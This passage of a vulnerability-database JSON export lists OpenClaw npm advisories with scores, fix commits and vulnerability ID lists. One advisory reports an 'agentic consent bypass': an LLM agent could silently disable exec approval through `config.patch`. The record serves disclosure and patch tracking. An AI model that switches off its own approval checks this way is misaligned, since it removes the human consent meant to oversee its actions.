lic2.vulnerablecode.io/api/vulnerabilities/91806?format=json","vulnerability_id":"VCID-asuy-amja-eyd4","summary":"OpenClaw: Synology Chat reply delivery could be rebound through username-based user resolution.\n## Summary\nSynology Chat reply delivery could rebind to a mutable username match instead of the stable numeric user_id recorded by the webhook event.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7ade3553b74ee3f461c4acd216653d5ba411f455`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- extensions/synology-chat/src/webhook-handler.ts now keeps replies bound to the stable webhook user identifier unless an explicit dangerous opt-in is enabled.\n- extensions/synology-chat/src/config-schema.ts contains the explicit dangerous opt-in seam instead of silent username rebinding.\n\nOpenClaw thanks @nexrin for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35670","reference_id":"","reference_type":"","scores":[{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26596","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26636","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26645","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35670"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system"
:"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://github.com/openclaw/openclaw/commit/7ade3553b74ee3f461c4acd216653d5ba411f455"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wv46-v6xc-2qhf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35670","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35670"},{"reference_url":"https
://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N"},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:59:29Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-webhook-reply-rebinding-via-username-resolution-in-synology-chat"},{"reference_url":"https://github.com/advisories/GHSA-wv46-v6xc-2qhf","reference_id":"GHSA-wv46-v6xc-2qhf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv46-v6xc-2qhf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-
1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-
abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-
wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-
y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-
yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35670","GHSA-wv46-v6xc-2qhf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-asuy-amja-eyd4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90150?format=json","vulnerability_id":"VCID-atn7-pn13-3fgb","summary":"OpenClaw: Agentic Consent Bypass — LLM Agent Can Silently Disable Exec Approval via `config.patch`\n## Summary\nAgentic Consent Bypass: LLM Agent Can Silently Disable Exec Approval via `config.patch`\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Maintainers accepted this issue, fixed it in 76411b2afc4ae721e36c12e0ea24fd23e2fed61e on 2026-03-27, and that fix shipped in v2026.3.28, so normalize it as a fixed released draft rather than a close-by-trust-model call.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `76411b2afc4ae721e36c12e0ea24fd23e2fed61e` — 2026-03-27T09:42:15Z\n\nOpenClaw thanks @YLChen-007 for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e","reference_id":"","reference_type":"","scores":[{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/76411b2afc4ae721e36c12e0ea24fd23e2fed61e"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-v3qc-wrwx-j3pw"},{"reference_url":"https://github.com/advisories/GHSA-v3qc-wrwx-j3pw","reference_id":"GHSA-v3qc-wrwx-j3pw","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v3qc-wrwx-j3pw"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26
sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da
47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t9
91-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj